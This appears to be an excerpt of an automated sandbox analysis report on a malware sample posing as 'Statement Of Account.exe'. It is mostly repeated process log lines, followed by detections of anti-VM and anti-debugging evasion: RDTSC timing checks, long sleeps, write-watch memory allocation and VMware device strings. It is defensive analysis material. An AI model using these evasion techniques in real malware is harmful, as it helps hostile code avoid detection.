Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2C49904 second address: 2C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 27B9B7E second address: 27B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2C49B7E second address: 2C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 14A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 1710000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 7C40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 8C40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 8DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: 9DE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: A310000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Memory allocated: B310000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: DA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 2AC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 4AC0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 7400000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 6E00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 8400000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 9400000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: 9820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: A820000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Memory allocated: B820000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Statement Of Account.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8179 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1059 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7517 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1888 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2015 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7921 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 877 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 862 Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 472
Source: C:\Windows\SysWOW64\cmstp.exe Window / User API: threadDelayed 9498
Found large amount of non-executed APIs
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 6.2 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Statement Of Account.exe TID: 6812 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep count: 8179 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304 Thread sleep time: -7378697629483816s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504 Thread sleep count: 1059 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep count: 2015 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep time: -4030000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep count: 7921 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 7960 Thread sleep time: -15842000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep count: 472 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep time: -944000s >= -30000s
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep count: 9498 > 30
Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844 Thread sleep time: -18996000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Statement Of Account.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000009.00000000.1714988461.00000000078A0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
